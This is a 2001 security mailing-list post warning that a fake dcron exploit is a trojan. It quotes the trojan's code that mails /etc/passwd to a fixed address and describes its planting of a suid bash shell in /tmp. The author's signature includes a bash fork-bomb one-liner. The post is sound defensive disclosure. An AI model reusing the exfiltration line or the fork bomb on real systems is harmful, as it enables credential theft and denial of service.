Vulnerability Development mailing list archives
yet another fake exploit making rounds
From: Michal Zalewski <lcamtuf () coredump cx>
Date: Thu, 20 Dec 2001 21:58:55 -0500 (EST)
Hello, Most recent (third) issue of "el8" zine, available at http://el8.8m.com, among other things claims to have a "0-day" dcron exploit, allegedely coded by me and Rafal Wojtczuk (Nergal). /*************************************************************************\ | ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- | | | | brought to you by | | | | (C) Michal Zalewski <lcamtuf () ids pl> . and . Nergal <nergal () icm edu pl> | | | | ----------------------------------------------------------------------- | | Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] | | ----------------------------------------------------------------------- | | | \*************************************************************************/ [...cut...] This so-called exploit is already making rounds, not only in script kiddie community, but also being run by many admins to test their boxes. I got reports from several people letting me know "it did not work". I looked at it, and it appears to be a very nicely crafted trojan horse. It does send your /etc/passwd file to a fixed address your-address () mail com (source code suggests this is only a default, and can be changed by the victim, but because of always true conditional expression, user-specified value is overwritten later; this mailbox is probably valid and attended): /.../ email_address=(char*)strdup(optarg); break; /.../ if(email_address) { email_address=DEFAULT_EMAIL_ADDRESS; } /.../ fprintf(temp,"mail %s < /etc/passwd\n",email_address); Other than that, this exploit will also create a suid copy of /bin/bash in /tmp directory, named 'boomsh'. Even if it was not executed as root, it still gives the attacker an opportunity to escalate privileges locally and gain access to other accounts, perhaps after guessing at least one password. You probably do not want to run this exploit, the same applies to all other exploits coming from untrusted sources =) -- _____________________________________________________ Michal Zalewski [lcamtuf () bos bindview com] [security] [http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};: =-=> Did you know that clones never use mirrors? <=-= http://lcamtuf.coredump.cx/photo/
Current thread:
- yet another fake exploit making rounds Michal Zalewski (Dec 20)
- <Possible follow-ups>
- RE: yet another fake exploit making rounds Wall, Kevin (Dec 21)
- Re: yet another fake exploit making rounds xbud (Dec 21)
- Re: yet another fake exploit making rounds Michal Zalewski (Dec 21)
- RE: yet another fake exploit making rounds auto241065 (Dec 22)